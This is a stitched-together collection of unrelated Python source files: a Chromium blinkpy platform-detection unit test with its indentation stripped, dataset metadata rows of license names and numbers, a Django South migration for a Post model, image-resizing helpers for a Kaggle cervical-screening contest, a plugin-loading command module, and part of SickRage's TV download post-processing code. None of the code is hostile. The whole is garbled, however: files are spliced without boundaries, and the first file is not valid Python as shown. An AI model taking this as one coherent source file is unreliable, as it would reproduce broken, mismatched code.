# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import platform
import sys
import unittest
from blinkpy.common.system.executive import Executive
from blinkpy.common.system.executive_mock import MockExecutive
from blinkpy.common.system.filesystem import FileSystem
from blinkpy.common.system.filesystem_mock import MockFileSystem
from blinkpy.common.system.platform_info import PlatformInfo
def fake_sys(platform_str='darwin', windows_version_tuple=None):
class FakeSysModule(object):
platform = platform_str
if windows_version_tuple:
getwindowsversion = lambda x: windows_version_tuple
return FakeSysModule()
def fake_platform(mac_version_string='10.12.3',
release_string='bar',
linux_version='trusty'):
class FakePlatformModule(object):
def mac_ver(self):
return tuple([mac_version_string, tuple(['', '', '']), 'i386'])
def linux_distribution(self):
return tuple([None, None, linux_version])
def platform(self):
return 'foo'
def release(self):
return release_string
return FakePlatformModule()
def fake_executive(output=None):
if output:
return MockExecutive(output=output)
return MockExecutive(exception=SystemError)
class TestPlatformInfo(unittest.TestCase):
def make_info(self,
sys_module=None,
platform_module=None,
filesystem_module=None,
executive=None):
return PlatformInfo(sys_module or fake_sys(), platform_module
or fake_platform(), filesystem_module
or MockFileSystem(), executive or fake_executive())
def test_real_code(self):
# This test makes sure the real (unmocked) code actually works.
info = PlatformInfo(sys, platform, FileSystem(), Executive())
self.assertNotEquals(info.os_name, '')
self.assertNotEquals(info.os_version, '')
self.assertNotEquals(info.display_name(), '')
self.assertTrue(info.is_mac() or info.is_win() or info.is_linux()
or info.is_freebsd())
self.assertIsNotNone(info.terminal_width())
if info.is_linux():
self.assertIsNotNone(info.linux_distribution())
if info.is_mac():
self.assertTrue(info.total_bytes_memory() > 0)
else:
self.assertIsNone(info.total_bytes_memory())
def test_os_name_and_wrappers(self):
info = self.make_info(fake_sys('linux2'))
self.assertTrue(info.is_linux())
self.assertFalse(info.is_mac())
self.assertFalse(info.is_win())
self.assertFalse(info.is_freebsd())
info = self.make_info(fake_sys('linux3'))
self.assertTrue(info.is_linux())
self.assertFalse(info.is_mac())
self.assertFalse(info.is_win())
self.assertFalse(info.is_freebsd())
info = self.make_info(fake_sys('darwin'), fake_platform('10.12.3'))
self.assertEqual(info.os_name, 'mac')
self.assertFalse(info.is_linux())
self.assertTrue(info.is_mac())
self.assertFalse(info.is_win())
self.assertFalse(info.is_freebsd())
info = self.make_info(fake_sys('win32', tuple([6, 1, 7600])))
self.assertEqual(info.os_name, 'win')
self.assertFalse(info.is_linux())
self.assertFalse(info.is_mac())
self.assertTrue(info.is_win())
self.assertFalse(info.is_freebsd())
info = self.make_info(fake_sys('freebsd8'))
self.assertEqual(info.os_name, 'freebsd')
self.assertFalse(info.is_linux())
self.assertFalse(info.is_mac())
self.assertFalse(info.is_win())
self.assertTrue(info.is_freebsd())
with self.assertRaises(AssertionError):
self.make_info(fake_sys('vms'))
def test_os_version(self):
with self.assertRaises(AssertionError):
self.make_info(fake_sys('darwin'), fake_platform('10.6.3'))
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.10.0')).os_version, 'mac10.10')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.11.0')).os_version, 'mac10.11')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.12.0')).os_version, 'mac10.12')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.13.0')).os_version, 'mac10.13')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.14.0')).os_version, 'mac10.14')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.15.0')).os_version, 'mac10.15')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.16.0')).os_version, 'mac10.16')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('11.0.0')).os_version, 'mac11.0')
with self.assertRaises(AssertionError):
self.make_info(fake_sys('darwin'), fake_platform('10.20.0'))
self.assertEqual(
self.make_info(fake_sys('linux2')).os_version, 'trusty')
info = self.make_info(
fake_sys('linux2'), fake_platform(linux_version='utopic'))
self.assertEqual(info.os_version, 'trusty')
self.assertEqual(
self.make_info(
fake_sys('freebsd8'), fake_platform(
'', '8.3-PRERELEASE')).os_version, '8.3-PRERELEASE')
self.assertEqual(
self.make_info(
fake_sys('freebsd9'),
fake_platform('', '9.0-RELEASE')).os_version, '9.0-RELEASE')
with self.assertRaises(AssertionError):
self.make_info(fake_sys('win32', tuple([5, 0, 1234])))
with self.assertRaises(AssertionError):
self.make_info(fake_sys('win32', tuple([6, 1, 1234])))
self.assertEqual(
self.make_info(fake_sys('win32', tuple([10, 1, 1234]))).os_version,
'future')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([10, 0, 1234]))).os_version,
'10')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 3, 1234]))).os_version,
'8.1')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 2, 1234]))).os_version,
'8')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 1, 7601]))).os_version,
'7sp1')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 1, 7600]))).os_version,
'7sp0')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 0, 1234]))).os_version,
'vista')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([5, 1, 1234]))).os_version,
'xp')
with self.assertRaises(AssertionError):
self.make_info(
fake_sys('win32'), executive=fake_executive('5.0.1234'))
with self.assertRaises(AssertionError):
self.make_info(
fake_sys('win32'), executive=fake_executive('6.1.1234'))
def _assert_files_imply_linux_distribution(self, file_paths, distribution):
fs_module = MockFileSystem({file_path: '' for file_path in file_paths})
info = self.make_info(
sys_module=fake_sys('linux2'), filesystem_module=fs_module)
self.assertEqual(info.linux_distribution(), distribution)
def test_linux_distro_detection(self):
self._assert_files_imply_linux_distribution(['/etc/arch-release'],
'arch')
self._assert_files_imply_linux_distribution(['/etc/debian_version'],
'debian')
self._assert_files_imply_linux_distribution(['/etc/fedora-release'],
'fedora')
self._assert_files_imply_linux_distribution(
['/etc/fedora-release', '/etc/redhat-release'], 'fedora')
self._assert_files_imply_linux_distribution(['/etc/redhat-release'],
'redhat')
self._assert_files_imply_linux_distribution(['/etc/mock-release'],
'unknown')
def test_display_name(self):
info = self.make_info(fake_sys('darwin'))
self.assertNotEquals(info.display_name(), '')
info = self.make_info(fake_sys('win32', tuple([6, 1, 7600])))
self.assertNotEquals(info.display_name(), '')
info = self.make_info(fake_sys('linux2'))
self.assertNotEquals(info.display_name(), '')
info = self.make_info(fake_sys('freebsd9'))
self.assertNotEquals(info.display_name(), '')
def test_total_bytes_memory(self):
info = self.make_info(
fake_sys('darwin'),
fake_platform('10.12.3'),
executive=fake_executive('1234'))
self.assertEqual(info.total_bytes_memory(), 1234)
info = self.make_info(fake_sys('win32', tuple([6, 1, 7600])))
self.assertIsNone(info.total_bytes_memory())
info = self.make_info(fake_sys('linux2'))
self.assertIsNone(info.total_bytes_memory())
info = self.make_info(fake_sys('freebsd9'))
self.assertIsNone(info.total_bytes_memory())
def test_unsupported_platform(self):
with self.assertRaises(AssertionError):
self.make_info(fake_sys('cygwin'))
|
bsd-3-clause
| -1,177,675,067,622,290,200
| 40.863469
| 79
| 0.600264
| false
| 3.991907
| true
| false
| false
|
Tangxuguo/Django_SNS
|
osf/post/migrations/0001_initial.py
|
1
|
4772
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Post'
db.create_table(u'post_post', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('author', self.gf('django.db.models.fields.IntegerField')()),
('ts', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime(2015, 8, 30, 0, 0))),
('content', self.gf('django.db.models.fields.TextField')()),
('title', self.gf('django.db.models.fields.CharField')(default='New Post', max_length=100)),
('excerpt', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
('status', self.gf('django.db.models.fields.IntegerField')(default=0)),
('comment_status', self.gf('django.db.models.fields.IntegerField')(default=0)),
('pwd', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
('lastts', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('like_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('share_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('comment_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('album', self.gf('django.db.models.fields.IntegerField')(default=0)),
('cover', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'post', ['Post'])
# Adding M2M table for field tags on 'Post'
m2m_table_name = db.shorten_name(u'post_post_tags')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('post', models.ForeignKey(orm[u'post.post'], null=False)),
('tag', models.ForeignKey(orm[u'tag.tag'], null=False))
))
db.create_unique(m2m_table_name, ['post_id', 'tag_id'])
def backwards(self, orm):
# Deleting model 'Post'
db.delete_table(u'post_post')
# Removing M2M table for field tags on 'Post'
db.delete_table(db.shorten_name(u'post_post_tags'))
models = {
u'post.post': {
'Meta': {'object_name': 'Post'},
'album': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'author': ('django.db.models.fields.IntegerField', [], {}),
'comment_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'comment_status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'content': ('django.db.models.fields.TextField', [], {}),
'cover': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'excerpt': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lastts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'like_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'pwd': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'share_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['tag.Tag']", 'symmetrical': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'New Post'", 'max_length': '100'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 8, 30, 0, 0)'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'tag.tag': {
'Meta': {'object_name': 'Tag'},
'add_ts': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 8, 30, 0, 0)'}),
'cover': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
}
}
complete_apps = ['post']
|
gpl-3.0
| 580,585,524,880,129,500
| 58.6625
| 127
| 0.573764
| false
| 3.553239
| false
| false
| false
|
jjtoharia/Kaggle_Intel-MobileODT-Cervical-Cancer-Screening
|
jjtz_intel_funciones.py
|
1
|
3570
|
#!/usr/bin/env python3
#Quiero utf8: áéíóú
from PIL import ImageFilter, ImageStat, Image, ImageDraw
from multiprocessing import Pool, cpu_count
# conda install --channel https://conda.anaconda.org/menpo opencv3
from cv2 import imread as cv2_imread, resize as cv2_resize, INTER_AREA as cv2_INTER_AREA # http://tanbakuchi.com/posts/comparison-of-openv-interpolation-algorithms/
import time
def timefunc(f):
def f_timer(*args, **kwargs):
start = time.time()
result = f(*args, **kwargs)
end = time.time()
print(f.__name__, ': ', '{:,.4f}'.format(end - start), ' segs.')
return(result)
return(f_timer)
from datetime import datetime
def jj_datetime(): return(datetime.now().strftime('%Y-%m-%d %H:%M:%S -')) # print(jj_datetime(), xxxx)
def jj_datetime_filename(): return(datetime.now().strftime('%Y%m%d_%H%M%S'))
def jj_input_filename_suffix(n_resize_to, b_con_muestreo): return('_{:}'.format(n_resize_to) + ('_prueba' if b_con_muestreo else ''))
def jj_safe_exec(ret_if_exception, function, *args):
try:
return(function(*args))
except:
return(ret_if_exception)
def im_multi(path):
from PIL import ImageFilter, ImageStat, Image, ImageDraw
try:
im_stats_im_ = Image.open(path)
return [path, {'size': im_stats_im_.size}]
except:
print(path)
return [path, {'size': (0,0)}]
@timefunc
def im_stats(im_stats_df):
from multiprocessing import Pool, cpu_count
im_stats_d = {}
p = Pool(cpu_count() - 1)
#ret = [p.apply_async(im_multi, x) for x in im_stats_df['path']] # Y luego hay que usar ret[n].get() para sacar cada resultado!
ret = p.map(im_multi, im_stats_df['path'])
for i in range(len(ret)):
im_stats_d[ret[i][0]] = ret[i][1] # im_stats_d[ret[i].get()[0]] = ret[i].get()[1]
im_stats_df['size'] = im_stats_df['path'].map(lambda x: ' '.join(str(s) for s in im_stats_d[x]['size']))
return im_stats_df
def get_im_cv2_32(path):
img = cv2_imread(path)
resized = cv2_resize(img, (32, 32), cv2_INTER_AREA) #use cv2_resize(img, (64, 64), cv2_INTER_AREA)
return [path, resized]
def get_im_cv2_64(path):
img = cv2_imread(path)
resized = cv2_resize(img, (64, 64), cv2_INTER_AREA)
return [path, resized]
def get_im_cv2_256(path):
img = cv2_imread(path)
resized = cv2_resize(img, (256, 256), cv2_INTER_AREA)
return [path, resized]
def get_im_cv2_512(path):
img = cv2_imread(path)
resized = cv2_resize(img, (512, 512), cv2_INTER_AREA)
return [path, resized]
def get_im_cv2_1024(path):
img = cv2_imread(path)
resized = cv2_resize(img, (1024, 1024), cv2_INTER_AREA)
return [path, resized]
@timefunc
def normalize_image_features(paths, resize_to = 32):
import numpy as np
imf_d = {}
p = Pool(cpu_count())
if resize_to == 256:
ret = p.map(get_im_cv2_256, paths)
elif resize_to == 64:
ret = p.map(get_im_cv2_64, paths)
elif resize_to == 512:
ret = p.map(get_im_cv2_512, paths)
elif resize_to == 1024:
ret = p.map(get_im_cv2_1024, paths)
else:
ret = p.map(get_im_cv2_32, paths)
for i in range(len(ret)):
imf_d[ret[i][0]] = ret[i][1]
ret = []
fdata = [imf_d[f] for f in paths]
fdata = np.array(fdata, dtype=np.uint8)
fdata = fdata.transpose((0, 3, 1, 2))
fdata = fdata.astype('float32') # fdata.astype('float64')
fdata = fdata / 255
return fdata
|
mit
| 8,852,059,636,198,243,000
| 32.95098
| 164
| 0.596914
| false
| 2.807087
| false
| false
| false
|
natano/tiget
|
tiget/core/cmds/plugin.py
|
1
|
1498
|
import pkg_resources
from tiget.cmds import Cmd
from tiget.plugins import load_plugin, unload_plugin, reload_plugin, plugins
__all__ = ['Load', 'Reload', 'Unload']
class Load(Cmd):
description = 'load plugin'
def setup(self):
self.parser.add_argument('plugin_name', nargs='?')
def do(self, args):
if args.plugin_name:
try:
load_plugin(args.plugin_name)
except ImportError as e:
raise self.error(e)
else:
self.print('Available plugins:')
entry_points = pkg_resources.iter_entry_points('tiget.plugins')
names = set(ep.name for ep in entry_points)
names.update(plugins.keys())
for name in sorted(names):
loaded = name in plugins
self.print('[{}] {}'.format('*' if loaded else ' ', name))
class Reload(Cmd):
description = 'reload plugin'
def setup(self):
self.parser.add_argument('plugin_name')
def do(self, args):
try:
reload_plugin(args.plugin_name)
except KeyError:
raise self.error('no plugin "{}" loaded'.format(args.plugin_name))
class Unload(Cmd):
description = 'unload plugin'
def setup(self):
self.parser.add_argument('plugin_name')
def do(self, args):
try:
unload_plugin(args.plugin_name)
except KeyError:
raise self.error('no plugin "{}" loaded'.format(args.plugin_name))
|
isc
| 7,311,382,799,280,952,000
| 26.236364
| 78
| 0.577437
| false
| 3.994667
| false
| false
| false
|
kingmotley/SickRage
|
sickbeard/processTV.py
|
1
|
29337
|
# coding=utf-8
# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: https://sickrage.github.io/
# Git: https://github.com/SickRage/SickRage.git
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import os
import stat
# from functools import wraps
import shutil
import sickbeard
from sickbeard import postProcessor
from sickbeard import db, helpers
from sickbeard import logger
from sickbeard.name_parser.parser import NameParser, InvalidNameException, InvalidShowException
from sickbeard import common
from sickbeard import failedProcessor
from sickrage.helper.common import is_sync_file, is_torrent_or_nzb_file
from sickrage.helper.encoding import ek, ss
from sickrage.helper.exceptions import EpisodePostProcessingFailedException, ex, FailedPostProcessingFailedException
from unrar2 import RarFile
from unrar2.rar_exceptions import FileOpenError
from unrar2.rar_exceptions import ArchiveHeaderBroken
from unrar2.rar_exceptions import InvalidRARArchive
from unrar2.rar_exceptions import InvalidRARArchiveUsage
from unrar2.rar_exceptions import IncorrectRARPassword
import shutil_custom
shutil.copyfile = shutil_custom.copyfile_custom
class ProcessResult(object): # pylint: disable=too-few-public-methods
def __init__(self):
self.result = True
self.output = ''
self.missedfiles = []
self.aggresult = True
def delete_folder(folder, check_empty=True):
"""
Removes a folder from the filesystem
:param folder: Path to folder to remove
:param check_empty: Boolean, check if the folder is empty before removing it, defaults to True
:return: True on success, False on failure
"""
# check if it's a folder
if not ek(os.path.isdir, folder):
return False
# check if it isn't TV_DOWNLOAD_DIR
if sickbeard.TV_DOWNLOAD_DIR:
if helpers.real_path(folder) == helpers.real_path(sickbeard.TV_DOWNLOAD_DIR):
return False
# check if it's empty folder when wanted checked
if check_empty:
check_files = ek(os.listdir, folder)
if check_files:
logger.log(u"Not deleting folder {0} found the following files: {1}".format(folder, check_files), logger.INFO)
return False
try:
logger.log(u"Deleting folder (if it's empty): {0}".format(folder))
ek(os.rmdir, folder)
except (OSError, IOError) as e:
logger.log(u"Warning: unable to delete folder: {0}: {1}".format(folder, ex(e)), logger.WARNING)
return False
else:
try:
logger.log(u"Deleting folder: " + folder)
shutil.rmtree(folder)
except (OSError, IOError) as e:
logger.log(u"Warning: unable to delete folder: {0}: {1}".format(folder, ex(e)), logger.WARNING)
return False
return True
def delete_files(processPath, notwantedFiles, result, force=False):
"""
Remove files from filesystem
:param processPath: path to process
:param notwantedFiles: files we do not want
:param result: Processor results
:param force: Boolean, force deletion, defaults to false
"""
if not result.result and force:
result.output += logHelper(u"Forcing deletion of files, even though last result was not success", logger.DEBUG)
elif not result.result:
return
# Delete all file not needed
for cur_file in notwantedFiles:
cur_file_path = ek(os.path.join, processPath, cur_file)
if not ek(os.path.isfile, cur_file_path):
continue # Prevent error when a notwantedfiles is an associated files
result.output += logHelper(u"Deleting file: {0}".format(cur_file), logger.DEBUG)
# check first the read-only attribute
file_attribute = ek(os.stat, cur_file_path)[0]
if not file_attribute & stat.S_IWRITE:
# File is read-only, so make it writeable
result.output += logHelper(u"Changing ReadOnly Flag for file: {0}".format(cur_file), logger.DEBUG)
try:
ek(os.chmod, cur_file_path, stat.S_IWRITE)
except OSError as e:
result.output += logHelper(u"Cannot change permissions of {0}: {1}".format(cur_file_path, ex(e)), logger.DEBUG)
try:
ek(os.remove, cur_file_path)
except OSError as e:
result.output += logHelper(u"Unable to delete file {0}: {1}".format(cur_file, e.strerror), logger.DEBUG)
def logHelper(logMessage, logLevel=logger.INFO):
logger.log(logMessage, logLevel)
return logMessage + u"\n"
# def OneRunPP():
# isRunning = [False]
#
# def decorate(func):
# @wraps(func)
# def func_wrapper(*args, **kargs):
# if isRunning[0]:
# return logHelper(u'Post processor is already running', logger.WARNING)
#
# isRunning[0] = True
# ret = func(*args, **kargs)
# isRunning[0] = False
# return ret
# return func_wrapper
# return decorate
# pylint: disable=too-many-arguments,too-many-branches,too-many-statements,too-many-locals
# @OneRunPP()
def processDir(dirName, nzbName=None, process_method=None, force=False, is_priority=None, delete_on=False, failed=False, proc_type="auto"):
"""
Scans through the files in dirName and processes whatever media files it finds
:param dirName: The folder name to look in
:param nzbName: The NZB name which resulted in this folder being downloaded
:param force: True to postprocess already postprocessed files
:param failed: Boolean for whether or not the download failed
:param proc_type: Type of postprocessing auto or manual
"""
result = ProcessResult()
# if they passed us a real dir then assume it's the one we want
if ek(os.path.isdir, dirName):
dirName = ek(os.path.realpath, dirName)
result.output += logHelper(u"Processing folder {0}".format(dirName), logger.DEBUG)
# if the client and SickRage are not on the same machine translate the directory into a network directory
elif all([sickbeard.TV_DOWNLOAD_DIR,
ek(os.path.isdir, sickbeard.TV_DOWNLOAD_DIR),
ek(os.path.normpath, dirName) == ek(os.path.normpath, sickbeard.TV_DOWNLOAD_DIR)]):
dirName = ek(os.path.join, sickbeard.TV_DOWNLOAD_DIR, ek(os.path.abspath, dirName).split(os.path.sep)[-1])
result.output += logHelper(u"Trying to use folder: {0} ".format(dirName), logger.DEBUG)
# if we didn't find a real dir then quit
if not ek(os.path.isdir, dirName):
result.output += logHelper(u"Unable to figure out what folder to process. "
u"If your downloader and SickRage aren't on the same PC "
u"make sure you fill out your TV download dir in the config.",
logger.DEBUG)
return result.output
path, dirs, files = get_path_dir_files(dirName, nzbName, proc_type)
files = [x for x in files if not is_torrent_or_nzb_file(x)]
SyncFiles = [x for x in files if is_sync_file(x)]
nzbNameOriginal = nzbName
# Don't post process if files are still being synced and option is activated
postpone = SyncFiles and sickbeard.POSTPONE_IF_SYNC_FILES
if not postpone:
result.output += logHelper(u"PostProcessing Path: {0}".format(path), logger.INFO)
result.output += logHelper(u"PostProcessing Dirs: {0}".format(str(dirs)), logger.DEBUG)
videoFiles = [x for x in files if helpers.isMediaFile(x)]
rarFiles = [x for x in files if helpers.isRarFile(x)]
rarContent = []
if rarFiles:
rarContent = unRAR(path, rarFiles, force, result)
files += rarContent
videoFiles += [x for x in rarContent if helpers.isMediaFile(x)]
videoInRar = [x for x in rarContent if helpers.isMediaFile(x)] if rarContent else []
result.output += logHelper(u"PostProcessing Files: {0}".format(files), logger.DEBUG)
result.output += logHelper(u"PostProcessing VideoFiles: {0}".format(videoFiles), logger.DEBUG)
result.output += logHelper(u"PostProcessing RarContent: {0}".format(rarContent), logger.DEBUG)
result.output += logHelper(u"PostProcessing VideoInRar: {0}".format(videoInRar), logger.DEBUG)
# If nzbName is set and there's more than one videofile in the folder, files will be lost (overwritten).
nzbName = None if len(videoFiles) >= 2 else nzbName
process_method = process_method if process_method else sickbeard.PROCESS_METHOD
result.result = True
# Don't Link media when the media is extracted from a rar in the same path
if process_method in (u'hardlink', u'symlink') and videoInRar:
process_media(path, videoInRar, nzbName, u'move', force, is_priority, result)
delete_files(path, rarContent, result)
for video in set(videoFiles) - set(videoInRar):
process_media(path, [video], nzbName, process_method, force, is_priority, result)
elif sickbeard.DELRARCONTENTS and videoInRar:
process_media(path, videoInRar, nzbName, process_method, force, is_priority, result)
delete_files(path, rarContent, result, True)
for video in set(videoFiles) - set(videoInRar):
process_media(path, [video], nzbName, process_method, force, is_priority, result)
else:
for video in videoFiles:
process_media(path, [video], nzbName, process_method, force, is_priority, result)
else:
result.output += logHelper(u"Found temporary sync files: {0} in path: {1}".format(SyncFiles, path))
result.output += logHelper(u"Skipping post processing for folder: {0}".format(path))
result.missedfiles.append(u"{0} : Syncfiles found".format(path))
# Process Video File in all TV Subdir
for curDir in [x for x in dirs if validateDir(path, x, nzbNameOriginal, failed, result)]:
result.result = True
for processPath, dirlist_, fileList in ek(os.walk, ek(os.path.join, path, curDir), topdown=False):
if not validateDir(path, processPath, nzbNameOriginal, failed, result):
continue
SyncFiles = [x for x in fileList if is_sync_file(x)]
# Don't post process if files are still being synced and option is activated
postpone = SyncFiles and sickbeard.POSTPONE_IF_SYNC_FILES
if not postpone:
videoFiles = [x for x in fileList if helpers.isMediaFile(x)]
rarFiles = [x for x in fileList if helpers.isRarFile(x)]
rarContent = []
if rarFiles:
rarContent = unRAR(processPath, rarFiles, force, result)
fileList = set(fileList + rarContent)
videoFiles += [x for x in rarContent if helpers.isMediaFile(x)]
videoInRar = [x for x in rarContent if helpers.isMediaFile(x)] if rarContent else []
notwantedFiles = [x for x in fileList if x not in videoFiles]
if notwantedFiles:
result.output += logHelper(u"Found unwanted files: {0}".format(notwantedFiles), logger.DEBUG)
# Don't Link media when the media is extracted from a rar in the same path
if process_method in (u'hardlink', u'symlink') and videoInRar:
process_media(processPath, videoInRar, nzbName, u'move', force, is_priority, result)
process_media(processPath, set(videoFiles) - set(videoInRar), nzbName, process_method, force,
is_priority, result)
delete_files(processPath, rarContent, result)
elif sickbeard.DELRARCONTENTS and videoInRar:
process_media(processPath, videoInRar, nzbName, process_method, force, is_priority, result)
process_media(processPath, set(videoFiles) - set(videoInRar), nzbName, process_method, force,
is_priority, result)
delete_files(processPath, rarContent, result, True)
else:
process_media(processPath, videoFiles, nzbName, process_method, force, is_priority, result)
# Delete all file not needed and avoid deleting files if Manual PostProcessing
if not(process_method == u"move" and result.result) or (proc_type == u"manual" and not delete_on):
continue
delete_folder(ek(os.path.join, processPath, u'@eaDir'))
delete_files(processPath, notwantedFiles, result)
if all([not sickbeard.NO_DELETE or proc_type == u"manual",
process_method == u"move",
ek(os.path.normpath, processPath) != ek(os.path.normpath, sickbeard.TV_DOWNLOAD_DIR)]):
if delete_folder(processPath, check_empty=True):
result.output += logHelper(u"Deleted folder: {0}".format(processPath), logger.DEBUG)
else:
result.output += logHelper(u"Found temporary sync files: {0} in path: {1}".format(SyncFiles, processPath))
result.output += logHelper(u"Skipping post processing for folder: {0}".format(processPath))
result.missedfiles.append(u"{0} : Syncfiles found".format(path))
if result.aggresult:
result.output += logHelper(u"Successfully processed")
if result.missedfiles:
result.output += logHelper(u"I did encounter some unprocessable items: ")
for missedfile in result.missedfiles:
result.output += logHelper(u"[{0}]".format(missedfile))
else:
result.output += logHelper(u"Problem(s) during processing, failed the following files/folders: ", logger.WARNING)
for missedfile in result.missedfiles:
result.output += logHelper(u"[{0}]".format(missedfile), logger.WARNING)
return result.output
def validateDir(path, dirName, nzbNameOriginal, failed, result): # pylint: disable=too-many-locals,too-many-branches,too-many-return-statements
"""
Check if directory is valid for processing
:param path: Path to use
:param dirName: Directory to check
:param nzbNameOriginal: Original NZB name
:param failed: Previously failed objects
:param result: Previous results
:return: True if dir is valid for processing, False if not
"""
dirName = ss(dirName)
IGNORED_FOLDERS = [u'.AppleDouble', u'.@__thumb', u'@eaDir']
folder_name = ek(os.path.basename, dirName)
if folder_name in IGNORED_FOLDERS:
return False
result.output += logHelper(u"Processing folder " + dirName, logger.DEBUG)
if folder_name.upper().startswith(u'_FAILED_') or folder_name.upper().endswith(u'_FAILED_'):
result.output += logHelper(u"The directory name indicates it failed to extract.", logger.DEBUG)
failed = True
elif folder_name.upper().startswith(u'_UNDERSIZED_') or folder_name.upper().endswith(u'_UNDERSIZED_'):
result.output += logHelper(u"The directory name indicates that it was previously rejected for being undersized.", logger.DEBUG)
failed = True
elif folder_name.upper().startswith(u'_UNPACK') or folder_name.upper().endswith(u'_UNPACK'):
result.output += logHelper(u"The directory name indicates that this release is in the process of being unpacked.", logger.DEBUG)
result.missedfiles.append(u"{0} : Being unpacked".format(dirName))
return False
if failed:
process_failed(ek(os.path.join, path, dirName), nzbNameOriginal, result)
result.missedfiles.append(u"{0} : Failed download".format(dirName))
return False
if helpers.is_hidden_folder(ek(os.path.join, path, dirName)):
result.output += logHelper(u"Ignoring hidden folder: {0}".format(dirName), logger.DEBUG)
result.missedfiles.append(u"{0} : Hidden folder".format(dirName))
return False
# make sure the dir isn't inside a show dir
main_db_con = db.DBConnection()
sql_results = main_db_con.select("SELECT location FROM tv_shows")
for sqlShow in sql_results:
if dirName.lower().startswith(ek(os.path.realpath, sqlShow["location"]).lower() + os.sep) or \
dirName.lower() == ek(os.path.realpath, sqlShow["location"]).lower():
result.output += logHelper(
u"Cannot process an episode that's already been moved to its show dir, skipping " + dirName,
logger.WARNING)
return False
# Get the videofile list for the next checks
allFiles = []
allDirs = []
for root_, processdir, fileList in ek(os.walk, ek(os.path.join, path, dirName), topdown=False):
allDirs += processdir
allFiles += fileList
videoFiles = [x for x in allFiles if helpers.isMediaFile(x)]
allDirs.append(dirName)
# check if the dir have at least one tv video file
for video in videoFiles:
try:
NameParser().parse(video, cache_result=False)
return True
except (InvalidNameException, InvalidShowException) as error:
result.output += logHelper(u"{0}".format(error), logger.DEBUG)
for proc_dir in allDirs:
try:
NameParser().parse(proc_dir, cache_result=False)
return True
except (InvalidNameException, InvalidShowException) as error:
result.output += logHelper(u"{0}".format(error), logger.DEBUG)
if sickbeard.UNPACK:
# Search for packed release
packedFiles = [x for x in allFiles if helpers.isRarFile(x)]
for packed in packedFiles:
try:
NameParser().parse(packed, cache_result=False)
return True
except (InvalidNameException, InvalidShowException) as error:
result.output += logHelper(u"{0}".format(error), logger.DEBUG)
result.output += logHelper(u"{0} : No processable items found in folder".format(dirName), logger.DEBUG)
return False
